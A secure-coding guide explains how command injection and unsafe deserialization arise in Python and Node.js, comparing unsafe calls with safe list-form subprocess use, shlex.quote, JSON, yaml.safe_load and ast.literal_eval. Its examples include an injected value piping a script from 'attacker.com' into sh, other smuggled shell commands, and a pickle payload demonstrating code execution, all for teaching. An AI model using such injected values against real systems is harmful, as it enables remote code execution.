Command injection and unsafe deserialization

Two distinct patterns lead to arbitrary code execution in application code: passing user-controlled data to a shell, and deserializing objects from untrusted sources. The RCE attack perspective covers what remote code execution looks like from the other side, and the insecure deserialisation page covers the deserialization attack surface in depth.

Command injection

The problem is not that an application runs external commands. It is how the command is constructed.

Python

subprocess.run() with a list of arguments and the default shell=False does not invoke a shell. Each list element is passed to the program as a separate argument, so shell metacharacters (; | && > $()) in user input are treated as literal text, not control flow:

import subprocess

# safe: list form, no shell
def convert_image(input_path: str, output_path: str) -> None:
    subprocess.run(
        ["convert", input_path, output_path],
        check=True,
        capture_output=True,
    )
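
To make the literal-argument behaviour concrete, the following sketch passes a hostile-looking string to a child process in list form and reads back what the child actually received. It uses the running Python interpreter as a stand-in for an external program such as convert; the helper name echo_argument is hypothetical.

```python
import subprocess
import sys


def echo_argument(value: str) -> str:
    """Run a child process in list form and return the argument it received."""
    result = subprocess.run(
        # The child is a tiny Python program that writes its first argument back.
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", value],
        check=True,
        capture_output=True,
        text=True,
    )
    return result.stdout


hostile = "x; echo injected | sh"
# No shell is involved, so the child receives the whole string as one argument.
received = echo_argument(hostile)
```

Here received is identical to hostile: the semicolon and pipe arrive as ordinary characters and nothing is executed on their behalf.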

The unsafe alternative for comparison:

# unsafe: shell=True passes the string to /bin/sh
def convert_image_unsafe(input_path: str, output_path: str) -> None:
    subprocess.run(f"convert {input_path} {output_path}", shell=True)
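    # input_path = "x; curl attacker.com | sh #" runs "convert x", then pipes
    # the downloaded script into sh; the trailing # comments out output_path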

os.system() and os.popen() always invoke a shell, so both belong in the same unsafe category as shell=True.

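When a shell is genuinely required (for pipes, shell built-ins, or glob expansion), use shlex.quote() on each user-controlled value before interpolating it into the command string. shlex.quote() is designed for POSIX shells and does not produce safe quoting for cmd.exe or PowerShell: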

import shlex, subprocess

def grep_log(pattern: str, logfile: str) -> str:
    # "--" ends option parsing, so a pattern starting with "-" is not read as a flag
    cmd = f"grep -- {shlex.quote(pattern)} {shlex.quote(logfile)}"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout
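
It can help to see what shlex.quote() actually returns. The short sketch below quotes three sample values (all of them made up for illustration) and then uses shlex.split(), which follows POSIX shell word-splitting rules, to confirm that a quoted value survives as a single word.

```python
import shlex

# A value with no shell-special characters is returned unchanged.
plain = shlex.quote("access.log")            # access.log

# Anything else is wrapped in single quotes, so ; and | lose their meaning.
hostile = shlex.quote("x; rm -rf /tmp/demo")  # 'x; rm -rf /tmp/demo'

# An embedded single quote is closed, escaped, and reopened.
with_quote = shlex.quote("it's")             # 'it'"'"'s'

# Round trip: the quoted value splits back into exactly one argument.
words = shlex.split(f"grep {hostile} {plain}")
```

After the round trip, words holds three items: grep, the original hostile string with its semicolon intact, and access.log.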

Prefer the list form where possible.
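
When a pipe is the only reason for reaching for a shell, the pipeline can often be assembled in Python instead. The following is a minimal sketch, assuming both stages are short-lived and that the intermediate output fits in memory; pipe_commands is a hypothetical helper, not part of the standard library.

```python
import subprocess
from typing import Sequence


def pipe_commands(first: Sequence[str], second: Sequence[str]) -> str:
    """Run the equivalent of `first | second` without a shell."""
    # Stage one: capture the raw bytes written by the first command.
    produced = subprocess.run(list(first), check=True, capture_output=True)
    # Stage two: feed those bytes to the second command on stdin.
    consumed = subprocess.run(
        list(second), input=produced.stdout, check=True, capture_output=True
    )
    return consumed.stdout.decode()
```

A call such as pipe_commands(["grep", "--", pattern, logfile], ["sort", "-u"]) would then replace a grep | sort -u shell string. Because check=True is set, a non-zero exit status (which grep also uses to signal "no match") raises subprocess.CalledProcessError, so callers may need to handle that case.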

Node.js

child_process.execFile() takes a command and arguments separately and does not invoke a shell:

const { execFile } = require("child_process");
const { promisify } = require("util");
const execFileAsync = promisify(execFile);

async function convertImage(inputPath, outputPath) {
    // safe: execFile does not invoke a shell
    await execFileAsync("convert", [inputPath, outputPath]);
}

exec() and execSync() pass a string to the shell. spawn() with shell: false (the default) is the low-level equivalent of execFile().

Unsafe deserialization

Python pickle

Python’s pickle module can execute arbitrary code during deserialization. Any pickle data from outside the application is a code execution vector:

import pickle

# unsafe: loading attacker-controlled bytes
def load_session(data: bytes):
    return pickle.loads(data)  # attacker can run arbitrary code here
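
The mechanism is that a pickle stream can name any importable callable together with the arguments to call it with, and pickle.loads() performs that call while rebuilding the object. The sketch below shows this with a deliberately harmless payload; the Payload class is hypothetical, and a real attacker would substitute a callable such as os.system.

```python
import pickle


class Payload:
    """Stand-in for an attacker-crafted object."""

    def __reduce__(self):
        # Tells pickle: "to rebuild me, call eval('6 * 7')".
        # Harmless here, but any importable callable and arguments would work.
        return (eval, ("6 * 7",))


malicious_bytes = pickle.dumps(Payload())

# The receiving side only calls loads(); the call to eval happens inside it.
result = pickle.loads(malicious_bytes)
```

Here result is the integer 42 rather than a Payload instance, which shows that the loader ran the expression chosen by whoever produced the bytes.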

Use JSON for data that crosses trust boundaries. JSON carries no executable semantics:

import json

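def load_session(data: str) -> dict:
    session = json.loads(data)
    if not isinstance(session, dict):  # valid JSON can also be a list, string, or number
        raise ValueError("session payload must be a JSON object")
    return session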

When structured Python objects are genuinely needed across a trust boundary, use a schema library (Pydantic, marshmallow, or attrs with cattrs) to validate the parsed JSON and build typed objects from it.
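
As a rough illustration of that pattern without committing to a particular library, the sketch below parses JSON and then checks it by hand before building a small dataclass. The Session fields (user_id, roles) are hypothetical; a library such as Pydantic would replace the manual checks with a declared schema.

```python
import json
from dataclasses import dataclass


@dataclass(frozen=True)
class Session:
    user_id: int
    roles: tuple[str, ...]


def parse_session(raw: str) -> Session:
    """Parse untrusted JSON and return a Session, or raise ValueError."""
    try:
        data = json.loads(raw)
    except json.JSONDecodeError as exc:
        raise ValueError("payload is not valid JSON") from exc
    # Require exactly the expected keys; reject anything extra or missing.
    if not isinstance(data, dict) or set(data) != {"user_id", "roles"}:
        raise ValueError("unexpected payload shape")
    user_id, roles = data["user_id"], data["roles"]
    # bool is a subclass of int, so reject it explicitly.
    if not isinstance(user_id, int) or isinstance(user_id, bool):
        raise ValueError("user_id must be an integer")
    if not isinstance(roles, list) or not all(isinstance(r, str) for r in roles):
        raise ValueError("roles must be a list of strings")
    return Session(user_id=user_id, roles=tuple(roles))
```

The point of the design is that only plain data crosses the boundary, and the application decides which fields and types become an object.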

YAML

PyYAML’s yaml.load() with an unsafe loader (yaml.Loader or yaml.UnsafeLoader) can construct arbitrary Python objects, and therefore run arbitrary code, when it encounters Python-specific tags. yaml.safe_load() restricts parsing to standard YAML tags, which produce plain data types such as strings, numbers, lists, and dicts:

import yaml

# unsafe: executes Python via tags such as !!python/object/apply
data = yaml.load(user_input, Loader=yaml.UnsafeLoader)

# safe: restricted parser, no code execution
data = yaml.safe_load(user_input)

Since PyYAML 5.1, calling yaml.load() without an explicit Loader emits a warning, and since PyYAML 6.0 the Loader argument is required. Passing Loader=yaml.FullLoader is not sufficient for untrusted input; SafeLoader (which yaml.safe_load() uses) is the appropriate choice for data from outside the application.
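
The sketch below shows what the safe loader does with a document that carries a Python-specific tag. It assumes PyYAML is installed; parse_untrusted_yaml is a hypothetical wrapper, and converting the error to ValueError is just one possible convention.

```python
import yaml  # PyYAML


def parse_untrusted_yaml(text: str):
    """Parse YAML with the safe loader; raise ValueError on anything it rejects."""
    try:
        return yaml.safe_load(text)
    except yaml.YAMLError as exc:
        # Covers ConstructorError, raised for tags such as !!python/object/apply.
        raise ValueError("rejected YAML document") from exc


# Plain data parses normally.
config = parse_untrusted_yaml("name: demo\nretries: 3")

# A document asking the loader to call os.getcwd() is refused, not executed.
try:
    parse_untrusted_yaml("!!python/object/apply:os.getcwd []")
    tagged_rejected = False
except ValueError:
    tagged_rejected = True
```

With the safe loader the tagged document fails at construction time, so the named callable is never invoked.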

Sandboxed evaluation

When the application requires evaluating user-supplied expressions (calculator, formula engine, template language), a purpose-built library is safer than a general-purpose interpreter:

  • Python: ast.literal_eval() evaluates Python literals only (strings, bytes, numbers, tuples, lists, dicts, sets, booleans, None). It does not execute function calls or imports.

  • JavaScript: isolated-vm provides a V8 isolate with explicit memory and CPU limits. vm2 is sometimes used for the same purpose, but it has a record of critical sandbox escapes and should not be relied on as a security boundary; isolated-vm is the more hardened option.

Both approaches have limits. A formula language with access to arbitrary numeric operations can still cause denial of service through resource exhaustion; set explicit timeouts and memory caps.
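
For the Python case, a minimal sketch of wrapping ast.literal_eval() with a crude input-size cap might look like the following. MAX_EXPR_LEN and parse_literal are hypothetical names, and the length check is only a first line of defence; it does not replace process-level timeouts or memory limits.

```python
import ast

MAX_EXPR_LEN = 1_000  # hypothetical cap; tune to the application


def parse_literal(text: str):
    """Evaluate a Python literal from untrusted text, or raise ValueError."""
    if len(text) > MAX_EXPR_LEN:
        raise ValueError("input too long")
    try:
        return ast.literal_eval(text)
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError) as exc:
        # Calls, names, attribute access, and malformed input all end up here.
        raise ValueError("not a valid literal") from exc


settings = parse_literal("{'retries': 3, 'hosts': ['a', 'b']}")
```

An input such as "__import__('os').getcwd()" is rejected with ValueError because a function call is not a literal.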